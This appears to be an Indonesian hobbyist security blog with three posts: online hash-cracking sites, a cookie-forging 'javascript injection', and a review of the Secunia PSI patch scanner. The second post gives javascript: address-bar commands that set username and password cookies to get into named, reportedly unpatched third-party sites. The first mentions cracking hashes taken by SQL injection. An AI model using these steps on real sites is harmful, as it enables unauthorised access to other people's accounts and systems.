web based Hash(-ing)

apa sich software tuk cek nilai hash

kemaren ada yang nyasar ke blog ini ama kata kunci itu
saya orangnya pemalas dan rada parno ama software gratisan … takutnya disisipin trojan di softwarenya dan ga ke detect ama antivitus+update terbarunya sekalipun

makanya untuk hash-ing (convert to/reverse) saya lebih suka “web based hash(-ing)” (makin parah ajah ni kosakata IT nya :p) … beberapa situs yang saya suka pake:
-passcracking
-benramsey
-hashcrack
-reversehas
-dustinfineout

Kenapa link2 diatas? soalnya saya sering nemu “jawaban” dari hasil sql injection disana ,databasenya lumayan okeh … trus beberapa link diatas udah pake kombinasi teknik: classic rainbow tables, hybrid rainbow tables, & dictionary … dan yang paling penting: gratis, ga usah registrasi, & ga perlu install

javascript injection

lagi nyari informasi tentang sql injection trus “nyasar” ke sekuritionline … eh malah dapet informasi tentang javascript
celah ini juga sudah di publish di beberapa website sekuriti lain, termasuk secunia.

berikut ini beberapa situs yang masih belum di patch waktu saya coba:
ebook
hotscripts
rss
membership
recipe

cukup masukan javascript berikut ke address bar di browser:

javascript:document.cookie = “username=kanabies; path=/”;

javascript:document.cookie = “password=kanabies; path=/”;

perintah itu akan membuat username dan password: kanabies
hal ini bisa dicek dengan memasukan salah satu syntax berikut ke address bar di browser:

javascript:alert(document.cookie)

javascript:alert(unescape(document.cookie))

javascript:alert(unescape(document.cookie).replace(/;/gi,”\n\n”))

javascript:alert(unescape(unescape(document.cookie)).replace(/;/gi,”\n\n”))

setelah itu kita bisa masuk ke menu yang ada dan menjalankan perintah/fitur yand ada

di firefox ada addon yang khusus untuk mengedit cookies:
firefox-addons

CMIIW,
ga ada sql … javascript pun jadi

sumber:
sekuritionline
jammed
javaranch

Secunia- Personal Software Inspector (PSI)

Untuk menjaga keamanan aplikasi-aplikasi yang terinstall di komputer kita ada baiknya apabila kita selalu meng-update patches atau menginstall versi terbaru dari aplikasi-aplikasi yang kita gunakan. Secunia, computer security service provider dari denmark yang didirikan oleh Niels Henrik Rasmussen dan Thomas Kristensen, membuat sebuah aplikasi gratis (untuk penggunaan personal) yang membantu kita untuk men-scan&udpate dari masing2 aplikasi yang terinstall di komputer kita. Selain untuk meng-update aplikasi yang ada, secunia juga bisa untuk men-scan virus. Adapun produk yang dikembangkan oleh mereka adalah:
-Enterprise Security Manager
-Vulnerability Tracking Service
-Surveillance Scanner
-Network Software Inspector
-Personal Software Inspector
-Online Software Inspector

Beikut fitur utama secunia-PSI:
-Scan, melakukan scan terhadap program-program yang ada di komputer
-Insecure Program, memberikan informasi program yang “kurang aman” dan memberikan informasi link download program terbaru atau solusinya, add/remove program, referensi online, detail dan sebagainya.
-End of Life, memberikan informasi program yang tidak di support lagi oleh vendor pembuatnya. Disertai link download versi terbaru atau untuk uninstall.
-Patched, memberikan informasi program yang dideteksi, tetapi diketahui tidak mempunyai update security (jadi mungkin tidak memerlukan perhatian yang lebih)
-Overview, memberikan informasi (gambaran umum) kondisi komputer setelah di scan.

Di ZDNet, Secunia PSI masuk daftar 10 besar Essential security tools, dan berada di urutan pertama dalam kategori free software. Aplikasi ini hanya berukuran sekitar 521 KB dan bisa berjalan di platform Windows 2000, XP 32/64bit, dan Vista 32/64bit. Agar bisa berjalan (Scan) maka perlu adanya koneksi internet.

Link:
en.wikipedia.org
download PSIsetup.exe
advisories

CMIIW,
Stay secure